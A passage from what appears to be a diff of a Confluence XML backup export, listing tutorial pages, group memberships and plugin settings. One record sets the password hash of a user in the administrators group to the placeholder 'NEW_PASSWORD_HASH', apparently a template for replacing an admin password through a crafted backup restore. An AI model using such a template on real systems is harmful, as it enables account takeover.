+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262167</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262185</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.044</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">6</property>
+<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="InternalUserCredentialRecord" package="com.atlassian.crowd.model.user">
+<id name="id">524289</id>
+<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
+</property>
+<property name="passwordHash"><![CDATA[NEW_PASSWORD_HASH]]></property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98313</id>
+<property name="hibernateVersion">13</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262191</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.049</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98312</id>
+<property name="hibernateVersion">14</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262193</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.053</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98311</id>
+<property name="hibernateVersion">16</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262177</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.056</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98318</id>
+<property name="hibernateVersion">42</property>
+<property name="title"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
+<property name="lowerTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163850</id>
+</element>
+</collection>
+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196627</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196629</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196631</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196632</id>
+</element>
+</collection>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262160</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262162</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.061</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98342</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98346</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98350</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98352</id>
+</element>
+</collection>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">3</property>
+<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98317</id>
+<property name="hibernateVersion">28</property>
+<property name="title"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
+<property name="lowerTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163841</id>
+</element>
+</collection>
+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196616</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196639</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196642</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196643</id>
+</element>
+</collection>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262154</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.065</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98337</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98345</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98347</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98349</id>
+</element>
+</collection>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">2</property>
+<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98316</id>
+<property name="hibernateVersion">16</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262173</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.071</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98315</id>
+<property name="hibernateVersion">5</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262159</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.074</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98322</id>
+<property name="hibernateVersion">53</property>
+<property name="title"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
+<property name="lowerTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163849</id>
+</element>
+</collection>
+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196650</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196651</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196652</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196653</id>
+</element>
+</collection>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262166</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262182</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.078</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98339</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98355</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98356</id>
+</element>
+</collection>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">1</property>
+<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98321</id>
+<property name="hibernateVersion">38</property>
+<property name="title"><![CDATA[Lay out your page (step 6 of 9)]]></property>
+<property name="lowerTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163848</id>
+</element>
+</collection>
+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196628</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196633</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196634</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196635</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196636</id>
+</element>
+</collection>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262153</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262156</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.083</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98340</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98348</id>
+</element>
+<element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98353</id>
+</element>
+</collection>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">5</property>
+<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98320</id>
+<property name="hibernateVersion">24</property>
+<property name="title"><![CDATA[What is Confluence? (step 1 of 9)]]></property>
+<property name="lowerTitle"><![CDATA[what is confluence? (step 1 of 9)]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163843</id>
+</element>
+</collection>
+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196621</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196625</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196630</id>
+</element>
+</collection>
+<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262155</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.086</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">0</property>
+<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98319</id>
+<property name="hibernateVersion">30</property>
+<property name="title"><![CDATA[Welcome to Confluence]]></property>
+<property name="lowerTitle"><![CDATA[welcome to confluence]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163842</id>
+</element>
+</collection>
+<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196624</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196637</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196638</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196640</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196641</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196645</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196646</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196647</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196648</id>
+</element>
+<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196649</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.089</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98338</id>
+</element>
+</collection>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position">8</property>
+<collection name="children" class="java.util.Collection"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98305</id>
+</element>
+<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98306</id>
+</element>
+<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
+</element>
+<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</element>
+<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
+</element>
+<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
+</element>
+<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
+</element>
+<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
+</element>
+<element class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98326</id>
+<property name="hibernateVersion">13</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262194</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.093</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98325</id>
+<property name="hibernateVersion">10</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262181</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.096</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98324</id>
+<property name="hibernateVersion">10</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262179</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.100</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98323</id>
+<property name="hibernateVersion">7</property>
+<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262157</id>
+</element>
+<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262158</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:52.104</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[draft]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</element>
+</collection>
+</object>
+<object class="SpaceDescription" package="com.atlassian.confluence.spaces">
+<id name="id">98357</id>
+<property name="hibernateVersion">17</property>
+<property name="title"/><property name="lowerTitle"/><collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163851</id>
+</element>
+</collection>
+<property name="version">1</property>
+<property name="creationDate">2020-04-14 11:55:11.912</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
+</property>
+</object>
+<object class="HibernateMembership" package="com.atlassian.crowd.embedded.hibernate2">
+<id name="id">589826</id>
+<property name="parentGroup" class="InternalGroup" package="com.atlassian.crowd.model.group"><id name="id">425985</id>
+</property>
+<property name="userMember" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
+</property>
+</object>
+<object class="HibernateMembership" package="com.atlassian.crowd.embedded.hibernate2">
+<id name="id">589825</id>
+<property name="parentGroup" class="InternalGroup" package="com.atlassian.crowd.model.group"><id name="id">425986</id>
+</property>
+<property name="userMember" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
+</property>
+</object>
+<object class="GlobalDescription" package="com.atlassian.confluence.setup.settings">
+<id name="id">98359</id>
+<property name="hibernateVersion">1</property>
+<property name="title"/><property name="lowerTitle"/><property name="version">1</property>
+<property name="creationDate">2023-11-09 06:04:19.475</property>
+<property name="lastModificationDate">2023-11-09 06:04:19.475</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+</object>
+<object class="PersonalInformation" package="com.atlassian.confluence.user">
+<id name="id">98358</id>
+<property name="hibernateVersion">1</property>
+<property name="title"/><property name="lowerTitle"/><property name="version">1</property>
+<property name="creationDate">2023-11-09 06:04:18.930</property>
+<property name="lastModificationDate">2023-11-09 06:04:18.930</property>
+<property name="versionComment"><![CDATA[]]></property>
+<property name="contentStatus"><![CDATA[current]]></property>
+<property name="user" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
+</property>
+</object>
+<object class="InternalGroup" package="com.atlassian.crowd.model.group">
+<id name="id">425986</id>
+<property name="name"><![CDATA[confluence-users]]></property>
+<property name="lowerName"><![CDATA[confluence-users]]></property>
+<property name="active">true</property>
+<property name="local">false</property>
+<property name="createdDate">2023-11-09 06:04:18.320</property>
+<property name="updatedDate">2023-11-09 06:04:18.320</property>
+<property name="description"/><property name="type" enum-class="GroupType" package="com.atlassian.crowd.model.group">GROUP</property>
+<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
+</property>
+<property name="externalId"/></object>
+<object class="InternalGroup" package="com.atlassian.crowd.model.group">
+<id name="id">425985</id>
+<property name="name"><![CDATA[confluence-administrators]]></property>
+<property name="lowerName"><![CDATA[confluence-administrators]]></property>
+<property name="active">true</property>
+<property name="local">false</property>
+<property name="createdDate">2023-11-09 06:04:18.284</property>
+<property name="updatedDate">2023-11-09 06:04:18.284</property>
+<property name="description"/><property name="type" enum-class="GroupType" package="com.atlassian.crowd.model.group">GROUP</property>
+<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
+</property>
+<property name="externalId"/></object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32802</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[confluence.extra.masterdetail:build]]></property>
+<property name="value"><![CDATA[<string>2</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32803</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-inline-comments:build]]></property>
+<property name="value"><![CDATA[<string>1</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32800</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.plugins.atlassian-nav-links-plugin:build]]></property>
+<property name="value"><![CDATA[<string>1</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32801</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-inline-tasks:build]]></property>
+<property name="value"><![CDATA[<string>3</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32798</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.plugins.atlassian-whitelist-core-plugin:build]]></property>
+<property name="value"><![CDATA[<string>3</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32799</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.plugins.custom_apps.hasCustomOrder]]></property>
+<property name="value"><![CDATA[<string>false</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32796</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.confluence.plugins.confluence-edge-index:build]]></property>
+<property name="value"><![CDATA[<string>1</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32797</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.crowd.embedded.admin:build]]></property>
+<property name="value"><![CDATA[<string>3</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32794</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.audit.plugin:audit-config:retention:period]]></property>
+<property name="value"><![CDATA[<string>P3Y</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32795</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.confluence.extra.team-calendars:build]]></property>
+<property name="value"><![CDATA[<string>1312121002</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32792</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.migration.agent:mp-status]]></property>
+<property name="value"><![CDATA[<string>{&quot;pluginVersionLastChecked&quot;:&quot;3.4.6&quot;,&quot;outdated&quot;:true,&quot;upgradeBy&quot;:null,&quot;timestamp&quot;:1699509836998}</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32793</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[com.atlassian.audit.atlassian-audit-plugin:build]]></property>
+<property name="value"><![CDATA[<string>2</string>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32790</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[atlassian.confluence.plugin.counter]]></property>
+<property name="value"><![CDATA[<int>3</int>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32791</id>
+<property name="context"><![CDATA[_GLOBAL]]></property>
+<property name="key"><![CDATA[reindex.status]]></property>
+<property name="value"><![CDATA[<com.atlassian.confluence.index.status.ReIndexJob>
+  <id>a051f6a2-cf76-4d3d-999d-ccfffe5e65d3</id>
+  <startTime>2023-11-09T06:03:55.369232Z</startTime>
+  <finishTime>2023-11-09T06:03:59.229997Z</finishTime>
+  <stage>COMPLETE</stage>
+  <acknowledged>false</acknowledged>
+  <rebuildingProgress>
+    <total>54</total>
+    <processed>54</processed>
+  </rebuildingProgress>
+  <lastRebuildingUpdate>2023-11-09T06:03:58.418741Z</lastRebuildingUpdate>
+  <nodeStatuses class="list"/>
+</com.atlassian.confluence.index.status.ReIndexJob>]]></property>
+</object>
+<object class="ConfluenceBandanaRecord" package="com.atlassian.confluence.setup.bandana">
+<id name="id">32788</id>
+<property name="context"><![CDATA[ds]]></property>
+<property name="key"><![CDATA[atlassian.confluence.colour.scheme]]></property>
+<property name="value"><![CDATA[<colourScheme>
+  <colours>
+    <entry>
